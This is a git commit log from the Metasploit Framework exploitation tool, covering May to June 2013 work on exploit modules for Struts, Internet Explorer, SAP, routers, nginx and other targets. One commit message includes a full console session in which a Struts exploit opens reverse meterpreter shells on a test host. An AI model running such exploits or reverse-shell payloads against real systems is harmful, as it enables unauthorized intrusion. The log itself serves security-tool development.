sinn3r cb33c5685f Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability 2013-06-02 12:35:40 -05:00
Steve Tornio 61c8861fcf add osvdb ref 2013-06-02 08:33:42 -05:00
sinn3r cc951e3412 Modifies the exploit a little for better stability
This patch makes sure the LFH is enabled before the CGenericElement
object is created.  Triggers is also modified a little.
2013-06-02 03:02:42 -05:00
jvazquez-r7 f68d35f251 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-01 17:09:23 -05:00
jvazquez-r7 1917961904 Land #1888, @swtornio's update for OSVDB references 2013-06-01 16:36:59 -05:00
jvazquez-r7 5939ca8ce4 Add analysis at the end of the module 2013-06-01 15:59:17 -05:00
jvazquez-r7 9be8971bb0 Add module for ZDI-13-094 2013-06-01 15:44:01 -05:00
Steve Tornio 8671ae9de7 add osvdb ref 2013-06-01 14:27:50 -05:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 d42ac02e3e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 23:01:05 -05:00
jvazquez-r7 f8e9535c39 Add ZDI reference 2013-05-31 20:50:53 -05:00
jvazquez-r7 3a360caba1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 19:03:21 -05:00
sinn3r 90117c322c Landing #1874 - Post API cleanup 2013-05-31 16:15:23 -05:00
James Lee 4f6d80c813 Land #1804, user-settable filename for psexec 2013-05-31 13:34:52 -05:00
James Lee 5964d36c40 Fix a syntax error
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
jvazquez-r7 48b14c09e3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 01:12:46 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
jvazquez-r7 70037fdbed Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-30 15:02:34 -05:00
jvazquez-r7 d0489b5d1e Delete some commas 2013-05-30 14:25:53 -05:00
jvazquez-r7 6abb591428 Do minor cleanup for lianja_db_net 2013-05-30 14:25:05 -05:00
jvazquez-r7 38e5c2bed2 Land #1877, @zeroSteiner's exploit for Lianja SQL 2013-05-30 14:23:45 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Spencer McIntyre 70e1379338 Use msvcrt in ropdb for stability. 2013-05-30 11:13:22 -04:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
jvazquez-r7 1d0c4151b7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-29 15:29:26 -05:00
Tod Beardsley e7a1f06fbc Modules shouldn't be +x 2013-05-29 15:11:35 -05:00
Console 7c38324b76 Considered using the bourne stager.
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre c3ab1ed2a5 Exploit module for Lianja SQL 1.0.0RC5.1 2013-05-29 08:48:41 -04:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post.
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
James Lee f3ff5b5205 Factorize and remove includes
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
jvazquez-r7 66ea59b03f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-28 15:22:46 -05:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r d16d316658 Fixes mssql_findandsampledata & ms11_006_createsizeddibsection
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r 73aa14cb91 Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946) 2013-05-28 11:02:21 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7 e678b2c5d8 Add module for CVE-2012-5946 2013-05-26 00:21:20 -05:00
darknight007 57b7e4ec44 Update ms11_006_createsizeddibsection.rb 2013-05-25 13:14:41 +06:00
jvazquez-r7 d5cf6c1fbc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-23 12:37:54 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
jvazquez-r7 23bc11c7e0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 15:15:58 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
jvazquez-r7 bfcd86022d Add code cleanup for nginx_chunked_size. 2013-05-22 14:37:42 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
jvazquez-r7 0dee5ae94d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 12:54:44 -05:00
LinuxGeek247 81b690ae4b Initial check in of nginx module 2013-05-22 13:52:00 -04:00
sinn3r ecb9d1d7fa Landing #1848 - AdobeCollabSync Buffer Overflow on Adobe Reader X 2013-05-22 12:24:42 -05:00
Joe Vennix aae4768563 Fix whitespace issues from msftidy. 2013-05-21 14:31:36 -05:00
Joe Vennix eaeb10742a Add some comments and clean some things up. 2013-05-21 14:01:14 -05:00
Joe Vennix 978aafcb16 Add DEBUG option, pass args to .encoded_exe(). 2013-05-21 14:01:14 -05:00
Joe Vennix ee8a97419c Add some debug print calls to investigate Auto platform selection. 2013-05-21 14:01:13 -05:00
Joe Vennix 60fdf48535 Use regenerate_payload(cli, ...). 2013-05-21 14:01:13 -05:00
jvazquez-r7 367e789047 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-20 18:49:38 -05:00
jvazquez-r7 53cb493bc9 Fix @jlee-r7's feedback 2013-05-20 18:44:21 -05:00
James Lee f4498c3916 Remove $Id tags
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7 94bc3bf8eb Fix msftidy warning 2013-05-20 10:35:59 -05:00
jvazquez-r7 395aac90c2 Do minor cleanup for linksys_wrt160nv2_apply_exec 2013-05-20 10:34:39 -05:00
jvazquez-r7 08b2c9db1e Land #1801, @m-1-k-3's linksys wrt160n exploit 2013-05-20 10:33:44 -05:00
jvazquez-r7 8235ba6316 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-20 08:48:42 -05:00
m-1-k-3 1a904ccf7d tftp download 2013-05-19 20:37:46 +02:00
jvazquez-r7 dfa19cb46d Do minor cleanup for dlink_dir615_up_exec 2013-05-19 12:43:01 -05:00
jvazquez-r7 348705ad46 Land #1800, @m-1-k-3's exploit for DLINK DIR615 2013-05-19 12:42:02 -05:00
m-1-k-3 f3a2859bed removed user,pass in request 2013-05-19 18:50:12 +02:00
m-1-k-3 aee5b02f65 tftp download check 2013-05-19 18:45:01 +02:00
m-1-k-3 4816925f83 feedback included 2013-05-19 16:19:45 +02:00
jvazquez-r7 85ceaa1a62 Add module for CVE-2013-2730 2013-05-18 12:44:24 -05:00
jvazquez-r7 0f3b13e21d up to date 2013-05-16 15:02:41 -05:00
James Lee 3009bdb57e Add a few more references for those without 2013-05-16 14:32:02 -05:00
h0ng10 ccef6e12d2 changed to array in array 2013-05-16 19:03:47 +02:00
h0ng10 460542506d changed to array 2013-05-16 19:01:20 +02:00
h0ng10 378f0fff5b added missing comma 2013-05-16 18:59:46 +02:00
Joe Vennix 1a5c747bb9 Update description. 2013-05-15 23:52:51 -05:00
Joe Vennix 178a43a772 Whitespace tweaks and minor bug fix. Wrong payloads still run. 2013-05-15 23:47:04 -05:00
Joe Vennix f4b6db8c49 Tweak whitespace. 2013-05-15 23:35:59 -05:00
Joe Vennix a7d79e2a51 Oops, don't cache payload_filename. 2013-05-15 23:34:14 -05:00
Joe Vennix 4d5c4f68cb Initial commit, works on three OSes, but automatic mode fails. 2013-05-15 23:32:02 -05:00
jvazquez-r7 cb24d3ddae Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-15 11:13:29 -05:00
James Lee 61afe1449e Landing #1275, bash cmdstager
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
jvazquez-r7 011b0bb741 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-15 09:07:47 -05:00
jvazquez-r7 649a8829d3 Add modules for Mutiny vulnerabilities 2013-05-15 09:02:25 -05:00
jvazquez-r7 352a7afcd6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 22:29:24 -05:00
sinn3r e1111928c2 Adds patch info for ie_cgenericelement_uaf
This one is MS13-038
2013-05-14 14:55:02 -05:00
jvazquez-r7 500ef5df13 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 14:49:05 -05:00
sinn3r 41e9f35f3f Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform 2013-05-14 14:48:16 -05:00
sinn3r 5e925f6629 Description update 2013-05-14 14:20:27 -05:00
jvazquez-r7 b9caa23b30 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-14 12:26:23 -05:00
jvazquez-r7 42cfa72f81 Update data after test kloxo 6.1.12 2013-05-13 19:09:06 -05:00
jvazquez-r7 58f2373171 Added module for EDB 25406 2013-05-13 18:08:23 -05:00
Tod Beardsley e3384439ed 64-bit, not '64 bits' 2013-05-13 15:40:17 -05:00
jvazquez-r7 01ce751c51 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-12 17:08:14 -05:00
m-1-k-3 981cc891bc description 2013-05-12 20:07:32 +02:00
jvazquez-r7 ce594a3ba2 Deprecate modules/exploits/windows/http/sap_mgmt_con_osexec_payload 2013-05-12 08:46:40 -05:00
jvazquez-r7 495f1e5013 Add multi platform module for SAP MC exec exploit 2013-05-12 08:46:00 -05:00
sinn3r 7fcf20201b Ranking should be the same (to GoodRanking) 2013-05-11 09:19:25 -05:00
jvazquez-r7 891e36c947 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-09 17:47:35 -05:00
jvazquez-r7 4147a27216 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 2013-05-09 17:00:11 -05:00
jvazquez-r7 6842432abb Land #1678, @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit 2013-05-09 16:52:01 -05:00
jvazquez-r7 823d89935a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-09 12:36:43 -05:00
Rob Fuller 95b0d4e5ec move filename init up to remove dup code
as suggested by @jlee-r7
2013-05-09 13:29:21 -04:00
sinn3r 9043eeda66 A slight change for stability
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in #1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable.  I did a few tests, seems better.
2013-05-08 20:02:55 -05:00
jvazquez-r7 866fa167ab Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-08 16:29:52 -05:00
jvazquez-r7 bdd2287daf Land #1809, @wchen-r7's modification for ie_cgenericelement_uaf 2013-05-08 16:21:11 -05:00
sinn3r 9a1400a75b Forgot to remove this print_warning 2013-05-08 15:44:04 -05:00
sinn3r 075f6e8d45 Updates ROP chain and mstime_malloc usage 2013-05-08 15:42:45 -05:00
sinn3r c7609ac7d1 Initial update 2013-05-08 14:24:52 -05:00
jvazquez-r7 1aa80cd35e Add module for CVE-2013-0726 2013-05-08 13:48:48 -05:00
jvazquez-r7 e939de583c Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec 2013-05-07 22:46:39 -05:00
jvazquez-r7 5f59d9f723 Move sap_soap_rfc_sxpg_command_exec to multi dir 2013-05-07 22:46:04 -05:00
jvazquez-r7 ab60e0bfb7 Fix print message 2013-05-07 22:41:15 -05:00
jvazquez-r7 24bad9c15c Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform 2013-05-07 17:03:10 -05:00
jvazquez-r7 76f6d9f130 Move module to multi-platform location 2013-05-07 17:01:56 -05:00
Rob Fuller 71c68d09c1 Allow user ability to set filename for psexec service binary
This should probably be higher up for all
generate_payload_exe but would take a major edit
2013-05-07 15:26:22 -03:00
jvazquez-r7 bcdad23559 up to date 2013-05-06 23:09:32 -05:00
jvazquez-r7 0fa65a6802 Merge branch 'sap_soap_rfc_sxpg_command_exec' of https://github.com/nmonkee/metasploit-framework 2013-05-06 18:50:31 -05:00
m-1-k-3 09bf23f4d6 linksys wrt160n tftp download module 2013-05-06 16:18:15 +02:00
m-1-k-3 22d850533a dir615 down and exec exploit 2013-05-06 15:33:45 +02:00
jvazquez-r7 425a16c511 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-05 22:00:07 -05:00
Tod Beardsley 8239998ada Typo on URL for #1797. Thx @Meatballs1 2013-05-05 12:26:06 -05:00
Tod Beardsley c9ea7e250e Fix disclosure date, ref for #1897 2013-05-05 12:13:02 -05:00
sinn3r a33510e821 Add MS IE8 DoL 0day exploit (CVE-2013-1347)
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
jvazquez-r7 2384f34ada Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-03 15:39:16 -05:00
jvazquez-r7 13202a3273 Add OSVDB reference 2013-05-03 09:46:29 -05:00
jvazquez-r7 a95de101e7 Delete extra line 2013-05-02 22:04:27 -05:00
jvazquez-r7 6210b42912 Port EDB 25141 to msf 2013-05-02 22:00:43 -05:00
jvazquez-r7 796f7a39ac Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-02 20:04:48 -05:00
jvazquez-r7 a2e1fbe7a9 Make msftidy happy 2013-05-02 19:46:26 -05:00
sinn3r eb23b5feeb Forgot to remove function ie8_smil. Don't need this anymore. 2013-05-02 14:04:15 -05:00
sinn3r 329e8228d1 Uses js_mstime_malloc to do the no-spray technique 2013-05-02 14:00:15 -05:00
jvazquez-r7 a7e4ba5015 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-30 08:32:24 -05:00
Tod Beardsley 60e0cfb17b Trivial description cleanup 2013-04-29 14:11:20 -05:00
jvazquez-r7 a4632b773a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-28 12:59:16 -05:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
[Closes #1772]
2013-04-28 12:17:16 -05:00